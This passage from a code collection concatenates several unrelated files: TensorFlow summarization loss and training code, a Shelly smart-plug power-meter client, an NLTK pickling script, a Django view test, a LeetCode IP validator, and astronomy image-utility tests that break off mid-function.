# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# # Error: actual_rewards = tf.reshape(tf.tile(actual_rewards, [FLAGS.max_doc_length]),[-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Multiply with reward
# reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Cross entroy / document
# reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
# tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean)
# return reward_weighted_cross_entropy_mean
# def temp_reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights):
# """Estimate cost of predictions
# Add summary for "cost" and "cost/avg".
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# Returns:
# Cross-entropy Cost
# """
# with tf.variable_scope('TempRewardWeightedCrossEntropyLoss') as scope:
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Multiply with reward
# reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Cross entroy / document
# reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_mean, var_list=policy_network_variables)
# # print(grads_and_vars)
# return actual_rewards, cross_entropy, diff_act_pred, reward_weighted_cross_entropy, reward_weighted_cross_entropy_mean, grads_and_vars
# def cross_entropy_loss_selfprediction(logits, weights):
# """Optimizing expected reward: Weighted cross entropy
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# return:
# [FLAGS.batch_size, FLAGS.max_doc_length]
# """
# with tf.variable_scope('SelfPredCrossEntropyLoss') as scope:
# # Reshape logits for argmax and argmin
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get labels if predicted using these logits
# logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
# labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
# labels = tf.cast(labels, dtype)
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # softmax_cross_entropy_with_logits
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights)
# return cross_entropy
# def weighted_cross_entropy_loss(logits, future_rewards, actual_reward, weights):
# """Optimizing expected reward: Weighted cross entropy
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# """
# with tf.variable_scope('WeightedCrossEntropyLoss') as scope:
# # Get Weights: External reward - Predicted reward
# actual_reward = tf.reshape(tf.tile(actual_reward, [FLAGS.max_doc_length]),[-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = future_rewards - actual_reward # actual_reward - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits for argmax and argmin
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get labels if predicted using these logits
# logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
# labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
# labels = tf.cast(labels, dtype)
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # softmax_cross_entropy_with_logits
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights)
# # Multiply with reward
# cross_entropy = tf.mul(cross_entropy, diff_act_pred)
# # Cross entroy / document
# cross_entropy = tf.reduce_sum(cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
# tf.add_to_collection('reward_cross_entropy_loss', cross_entropy_mean)
# # # # The total loss is defined as the cross entropy loss plus all of
# # # # the weight decay terms (L2 loss).
# # # return tf.add_n(tf.get_collection('losses'), name='total_loss')
# return cross_entropy_mean
### Training functions
def train_cross_entropy_loss(cross_entropy_loss):
""" Training with Gold Label: Pretraining network to start with a better policy
Args: cross_entropy_loss
"""
with tf.variable_scope('TrainCrossEntropyLoss') as scope:
optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# Compute gradients of policy network
policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# print(policy_network_variables)
grads_and_vars = optimizer.compute_gradients(cross_entropy_loss, var_list=policy_network_variables)
# print(grads_and_vars)
# Apply Gradients
return optimizer.apply_gradients(grads_and_vars)
def train_meansq_loss(futreward_meansq_loss):
""" Training with Gold Label: Pretraining network to start with a better policy
Args: futreward_meansq_loss
"""
with tf.variable_scope('TrainMeanSqLoss') as scope:
optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# Compute gradients of Future reward estimator
futreward_estimator_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="FutureRewardEstimator")
# print(futreward_estimator_variables)
grads_and_vars = optimizer.compute_gradients(futreward_meansq_loss, var_list=futreward_estimator_variables)
# print(grads_and_vars)
# Apply Gradients
return optimizer.apply_gradients(grads_and_vars)
def train_neg_expectedreward(reward_weighted_cross_entropy_loss_multisample):
"""Training with Policy Gradient: Optimizing expected reward
args:
reward_weighted_cross_entropy_loss_multisample
"""
with tf.variable_scope('TrainExpReward') as scope:
optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# Compute gradients of policy network
policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# print(policy_network_variables)
# Compute gradients of policy network
grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_loss_multisample, var_list=policy_network_variables)
# print(grads_and_vars)
# Clip gradient: Pascanu et al. 2013, Exploding gradient problem
grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# Apply Gradients
# return optimizer.apply_gradients(grads_and_vars)
return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def train_neg_expectedreward(reward_weighted_cross_entropy_loss):
# """Training with Policy Gradient: Optimizing expected reward
# args:
# reward_weighted_cross_entropy_loss
# """
# with tf.variable_scope('TrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_loss, var_list=policy_network_variables)
# # print(grads_and_vars)
# # Clip gradient: Pascanu et al. 2013, Exploding gradient problem
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# # Apply Gradients
# # return optimizer.apply_gradients(grads_and_vars)
# return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def train_neg_expectedreward(logits, d_ltheta_ot):
# """Training with Policy Gradient: Optimizing expected reward
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# d_ltheta_ot: Placeholder [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# """
# with tf.variable_scope('TrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Modify logits with d_ltheta_ot
# logits = tf.mul(logits, d_ltheta_ot)
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(logits, var_list=policy_network_variables)
# # print(grads_and_vars)
# # Clip gradient: Pascanu et al. 2013, Exploding gradient problem
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# # Apply Gradients
# # return optimizer.apply_gradients(grads_and_vars)
# return optimizer.apply_gradients(grads_and_vars_capped_norm)
# def temp_train_neg_expectedreward(logits, d_ltheta_ot):
# with tf.variable_scope('TempTrainExpReward') as scope:
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Modify logits with d_ltheta_ot
# logits = tf.mul(logits, d_ltheta_ot)
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(logits, var_list=policy_network_variables)
# grads_and_vars_capped_norm = [(tf.clip_by_norm(grad, 5.0), var) for grad, var in grads_and_vars]
# grads_and_vars_capped_val = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in grads_and_vars]
# # tf.clip_by_norm(t, clip_norm, axes=None, name=None)
# # https://www.tensorflow.org/versions/r0.11/api_docs/python/train/gradient_clipping
# return grads_and_vars, grads_and_vars_capped_norm, grads_and_vars_capped_val
### Accuracy Calculations
def accuracy(logits, labels, weights):
"""Estimate accuracy of predictions
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
labels: Sentence extraction gold levels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Accuracy: Estimates average of accuracy for each sentence
"""
with tf.variable_scope('Accuracy') as scope:
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
correct_pred = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1)) # [FLAGS.batch_size*FLAGS.max_doc_length]
correct_pred = tf.reshape(correct_pred, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
correct_pred = tf.cast(correct_pred, tf.float32)
# Get Accuracy
accuracy = tf.reduce_mean(correct_pred, name='accuracy')
if FLAGS.weighted_loss:
correct_pred = tf.mul(correct_pred, weights)
correct_pred = tf.reduce_sum(correct_pred, reduction_indices=1) # [FLAGS.batch_size]
doc_lengths = tf.reduce_sum(weights, reduction_indices=1) # [FLAGS.batch_size]
correct_pred_avg = tf.div(correct_pred, doc_lengths)
accuracy = tf.reduce_mean(correct_pred_avg, name='accuracy')
return accuracy
# Improve it to show exact accuracy (top three ranked ones), not all.
|
utils/measure/powermeter/shelly.py
|
mooonsee/homeassistant-powercalc
| 219 |
64382
|
<reponame>mooonsee/homeassistant-powercalc
from __future__ import annotations
import logging
import requests
import time
from .errors import ConnectionError
from .powermeter import PowerMeasurementResult, PowerMeter
_LOGGER = logging.getLogger("measure")
class ShellyApi:
status_endpoint = "/status"
meter_endpoint = "/meter/0"
def parse_json(self, json: str) -> tuple(float, float):
pass
class ShellyApiGen1(ShellyApi):
api_version = 1
def parse_json(self, json) -> tuple(float, float):
return (
float(json["power"]),
float(json["timestamp"])
)
class ShellyApiGen2(ShellyApi):
api_version = 2
status_endpoint = "/rpc/Shelly.GetStatus"
meter_endpoint = "/rpc/Switch.GetStatus?id=0"
def parse_json(self, json) -> tuple(float, float):
return (
float(json["apower"]),
time.time()
)
class ShellyPowerMeter(PowerMeter):
def __init__(self, shelly_ip: str, timeout: int = 5):
self.timeout = timeout
self.ip_address = shelly_ip
self.api = self.detect_api_type()
def get_power(self) -> PowerMeasurementResult:
r = requests.get("http://{}{}".format(self.ip_address, self.api.meter_endpoint), timeout=self.timeout)
json = r.json()
power = self.api.parse_json(json)
return PowerMeasurementResult(power[0], power[1])
def detect_api_type(self) -> ShellyApi:
for api in (ShellyApiGen1(), ShellyApiGen2()):
try:
uri = "http://{}{}".format(self.ip_address, api.status_endpoint)
_LOGGER.debug(f"Checking API connection: {uri}")
response = requests.get(uri, timeout=self.timeout)
except requests.RequestException:
_LOGGER.debug("Connection could not be established")
continue
if response.status_code != 200:
_LOGGER.debug(f"Unexpected status code {response.status_code}")
continue
_LOGGER.debug(f"Shelly API version {api.api_version} detected")
return api
raise ConnectionError("Could not connect to Shelly Plug")
|
Section 7 - Text Classification/Text Classification Part 2 - Pickling and Unpickling dataset.py
|
kungfumas/bahasa-alami
| 169 |
64389
|
# Text Classifiation using NLP
# Importing the libraries
import numpy as np
import re
import pickle
import nltk
from nltk.corpus import stopwords
from sklearn.datasets import load_files
nltk.download('stopwords')
# Importing the dataset
reviews = load_files('txt_sentoken/')
X,y = reviews.data,reviews.target
# Pickling the dataset
with open('X.pickle','wb') as f:
pickle.dump(X,f)
with open('y.pickle','wb') as f:
pickle.dump(y,f)
# Unpickling dataset
X_in = open('X.pickle','rb')
y_in = open('y.pickle','rb')
X = pickle.load(X_in)
y = pickle.load(y_in)
|
bootcamp/feeds/tests.py
|
elviva404/bootcamp
| 115 |
64406
|
from django.test import TestCase, Client
from django.contrib.auth.models import User
from .models import Feed
class FeedViewsTest(TestCase):
def setUp(self):
self.client = Client()
user = User.objects.create_user(
username='test_user',
email='<EMAIL>',
password='<PASSWORD>'
)
self.feed = Feed.objects.create(user=user, post='test feed')
def test_feeds(self):
response = self.client.get('/feeds/')
self.assertEqual(response.status_code, 200)
def test_feed(self):
response = self.client.get('/feeds/123/')
self.assertEqual(response.status_code, 404)
response = self.client.get(f'/feeds/{self.feed.pk}/')
self.assertEqual(response.status_code, 200)
|
Algo and DSA/LeetCode-Solutions-master/Python/validate-ip-address.py
|
Sourav692/FAANG-Interview-Preparation
| 3,269 |
64428
|
# Time: O(1)
# Space: O(1)
import string
class Solution(object):
def validIPAddress(self, IP):
"""
:type IP: str
:rtype: str
"""
blocks = IP.split('.')
if len(blocks) == 4:
for i in xrange(len(blocks)):
if not blocks[i].isdigit() or not 0 <= int(blocks[i]) < 256 or \
(blocks[i][0] == '0' and len(blocks[i]) > 1):
return "Neither"
return "IPv4"
blocks = IP.split(':')
if len(blocks) == 8:
for i in xrange(len(blocks)):
if not (1 <= len(blocks[i]) <= 4) or \
not all(c in string.hexdigits for c in blocks[i]):
return "Neither"
return "IPv6"
return "Neither"
|
test/test_Util/test_image_util.py
|
lucateo/lenstronomy
| 107 |
64458
|
<reponame>lucateo/lenstronomy<filename>test/test_Util/test_image_util.py
__author__ = 'sibirrer'
import lenstronomy.Util.util as util
import pytest
import unittest
import numpy as np
import numpy.testing as npt
import lenstronomy.Util.image_util as image_util
def test_add_layer2image_odd_odd():
grid2d = np.zeros((101, 101))
kernel = np.zeros((21, 21))
kernel[10, 10] = 1
x_pos = 50
y_pos = 50
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[50, 50] == 1
assert added[49, 49] == 0
x_pos = 70
y_pos = 95
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[95, 70] == 1
x_pos = 20
y_pos = 45
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[45, 20] == 1
x_pos = 45
y_pos = 20
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[20, 45] == 1
x_pos = 20
y_pos = 55
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[55, 20] == 1
x_pos = 20
y_pos = 100
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=0)
assert added[100, 20] == 1
x_pos = 20.5
y_pos = 100
added = image_util.add_layer2image(grid2d, x_pos, y_pos, kernel, order=1)
assert added[100, 20] == 0.5
assert added[100, 21] == 0.5
def test_add_layer2image_int():
grid2d = np.zeros((7, 7))
x_pos, y_pos = 4, 1
kernel = np.ones((3, 3))
added = image_util.add_layer2image_int(grid2d, x_pos, y_pos, kernel)
print(added)
assert added[0, 0] == 0
assert added[0, 3] == 1
added = image_util.add_layer2image_int(grid2d, x_pos + 10, y_pos, kernel)
print(added)
npt.assert_almost_equal(grid2d, added, decimal=9)
def test_add_background():
image = np.ones((10, 10))
sigma_bkgd = 1.
image_noisy = image_util.add_background(image, sigma_bkgd)
assert abs(np.sum(image_noisy)) < np.sqrt(np.sum(image)*sigma_bkgd)*3
def test_add_poisson():
image = np.ones((100, 100))
exp_time = 100.
poisson = image_util.add_poisson(image, exp_time)
assert abs(np.sum(poisson)) < np.sqrt(np.sum(image)/exp_time)*10
def test_findOverlap():
x_mins = [0,1,0]
y_mins = [1,2,1]
deltapix = 0.5
x_mins, y_mins = image_util.findOverlap(x_mins, y_mins, deltapix)
print(x_mins, y_mins)
assert x_mins[0] == 0
assert y_mins[0] == 1
assert len(x_mins) == 2
def test_coordInImage():
x_coord = [100,20,-10]
y_coord = [0,-30,5]
numPix = 50
deltapix = 1
x_result, y_result = image_util.coordInImage(x_coord, y_coord, numPix, deltapix)
assert x_result == -10
assert y_result == 5
def test_rebin_coord_transform():
x_grid, y_grid, ra_at_xy_0, dec_at_xy_0, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix = util.make_grid_with_coordtransform(numPix=3, deltapix=0.03, subgrid_res=1)
x_grid, y_grid, ra_at_xy_0_re, dec_at_xy_0_re, x_at_radec_0_re, y_at_radec_0_re, Mpix2coord_re, Mcoord2pix_re = util.make_grid_with_coordtransform(numPix=1, deltapix=0.09, subgrid_res=1)
ra_at_xy_0_resized, dec_at_xy_0_resized, x_at_radec_0_resized, y_at_radec_0_resized, Mpix2coord_resized, Mcoord2pix_resized = image_util.rebin_coord_transform(3, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix)
assert ra_at_xy_0_resized == ra_at_xy_0_re
assert dec_at_xy_0_resized == dec_at_xy_0_re
assert x_at_radec_0_resized == x_at_radec_0_re
assert y_at_radec_0_resized == y_at_radec_0_re
npt.assert_almost_equal(Mcoord2pix_resized[0][0], Mcoord2pix_re[0][0], decimal=8)
npt.assert_almost_equal(Mpix2coord_re[0][0], Mpix2coord_resized[0][0], decimal=8)
x_grid, y_grid, ra_at_xy_0, dec_at_xy_0, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix = util.make_grid_with_coordtransform(numPix=100, deltapix=0.05, subgrid_res=1)
x_grid, y_grid, ra_at_xy_0_re, dec_at_xy_0_re, x_at_radec_0_re, y_at_radec_0_re, Mpix2coord_re, Mcoord2pix_re = util.make_grid_with_coordtransform(numPix=50, deltapix=0.1, subgrid_res=1)
ra_at_xy_0_resized, dec_at_xy_0_resized, x_at_radec_0_resized, y_at_radec_0_resized, Mpix2coord_resized, Mcoord2pix_resized = image_util.rebin_coord_transform(2, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix)
assert ra_at_xy_0_resized == ra_at_xy_0_re
assert dec_at_xy_0_resized == dec_at_xy_0_re
assert x_at_radec_0_resized == x_at_radec_0_re
assert y_at_radec_0_resized == y_at_radec_0_re
npt.assert_almost_equal(Mcoord2pix_resized[0][0], Mcoord2pix_re[0][0], decimal=8)
npt.assert_almost_equal(Mpix2coord_re[0][0], Mpix2coord_resized[0][0], decimal=8)
x_grid, y_grid, ra_at_xy_0, dec_at_xy_0, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix = util.make_grid_with_coordtransform(numPix=99, deltapix=0.1, subgrid_res=1)
x_grid, y_grid, ra_at_xy_0_re, dec_at_xy_0_re, x_at_radec_0_re, y_at_radec_0_re, Mpix2coord_re, Mcoord2pix_re = util.make_grid_with_coordtransform(numPix=33, deltapix=0.3, subgrid_res=1)
assert x_at_radec_0 == 49
ra_at_xy_0_resized, dec_at_xy_0_resized, x_at_radec_0_resized, y_at_radec_0_resized, Mpix2coord_resized, Mcoord2pix_resized = image_util.rebin_coord_transform(3, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix)
assert x_at_radec_0_resized == 16
npt.assert_almost_equal(ra_at_xy_0_resized, ra_at_xy_0_re, decimal=8)
npt.assert_almost_equal(dec_at_xy_0_resized, dec_at_xy_0_re, decimal=8)
npt.assert_almost_equal(x_at_radec_0_resized, x_at_radec_0_re, decimal=8)
npt.assert_almost_equal(y_at_radec_0_resized, y_at_radec_0_re, decimal=8)
npt.assert_almost_equal(Mcoord2pix_resized[0][0], Mcoord2pix_re[0][0], decimal=8)
npt.assert_almost_equal(Mpix2coord_re[0][0], Mpix2coord_resized[0][0], decimal=8)
x_in, y_in = 10., 10.
ra, dec = util.map_coord2pix(x_in, y_in, ra_at_xy_0, dec_at_xy_0, Mpix2coord)
x_out, y_out = util.map_coord2pix(ra, dec, x_at_radec_0, y_at_radec_0, Mcoord2pix)
assert x_in == x_out
assert y_in == y_out
x_in, y_in = 10., 10.
ra, dec = util.map_coord2pix(x_in, y_in, ra_at_xy_0_resized, dec_at_xy_0_resized, Mpix2coord_resized)
x_out, y_out = util.map_coord2pix(ra, dec, x_at_radec_0_resized, y_at_radec_0_resized, Mcoord2pix_resized)
assert x_in == x_out
assert y_in == y_out
def test_rotateImage():
img = np.zeros((5, 5))
img[2, 2] = 1
img[1, 2] = 0.5
angle = 360
im_rot = image_util.rotateImage(img, angle)
npt.assert_almost_equal(im_rot[1, 2], 0.5, decimal=10)
npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
npt.assert_almost_equal(im_rot[2, 1], 0., decimal=10)
angle = 360./2
im_rot = image_util.rotateImage(img, angle)
npt.assert_almost_equal(im_rot[1, 2], 0., decimal=10)
npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
npt.assert_almost_equal(im_rot[3, 2], 0.5, decimal=10)
angle = 360./4
im_rot = image_util.rotateImage(img, angle)
npt.assert_almost_equal(im_rot[1, 2], 0., decimal=10)
npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
npt.assert_almost_equal(im_rot[2, 1], 0.5, decimal=10)
angle = 360./8
im_rot = image_util.rotateImage(img, angle)
npt.assert_almost_equal(im_rot[1, 2], 0.23931518624017051, decimal=10)
npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
npt.assert_almost_equal(im_rot[2, 1], 0.23931518624017073, decimal=10)
def test_re_size_array():
numPix = 9
kernel = np.zeros((numPix, numPix))
kernel[int((numPix-1)/2), int((numPix-1)/2)] = 1
subgrid_res = 2
input_values = kernel
x_in = np.linspace(0, 1, numPix)
x_out = np.linspace(0, 1, numPix*subgrid_res)
out_values = image_util.re_size_array(x_in, x_in, input_values, x_out, x_out)
kernel_out = out_values
assert kernel_out[int((numPix*subgrid_res-1)/2), int((numPix*subgrid_res-1)/2)] == 0.58477508650519028
def test_symmetry_average():
image = np.zeros((5,5))
image[2, 3] = 1
symmetry = 2
img_sym = image_util.symmetry_average(image, symmetry)
npt.assert_almost_equal(img_sym[2, 1], 0.5, decimal=10)
def test_cut_edges():
image = np.zeros((51,51))
image[25][25] = 1
numPix = 21
resized = image_util.cut_edges(image, numPix)
nx, ny = resized.shape
assert nx == numPix
assert ny == numPix
assert resized[10][10] == 1
image = np.zeros((5, 5))
image[2, 2] = 1
numPix = 3
image_cut = image_util.cut_edges(image, numPix)
assert len(image_cut) == numPix
assert image_cut[1, 1] == 1
image = np.zeros((6, 6))
image[3, 2] = 1
numPix = 4
image_cut = image_util.cut_edges(image, numPix)
assert len(image_cut) == numPix
assert image_cut[2, 1] == 1
image = np.zeros((6, 8))
image[3, 2] = 1
numPix = 4
image_cut = image_util.cut_edges(image, numPix)
assert len(image_cut) == numPix
assert image_cut[2, 0] == 1
def test_re_size():
grid = np.zeros((200, 100))
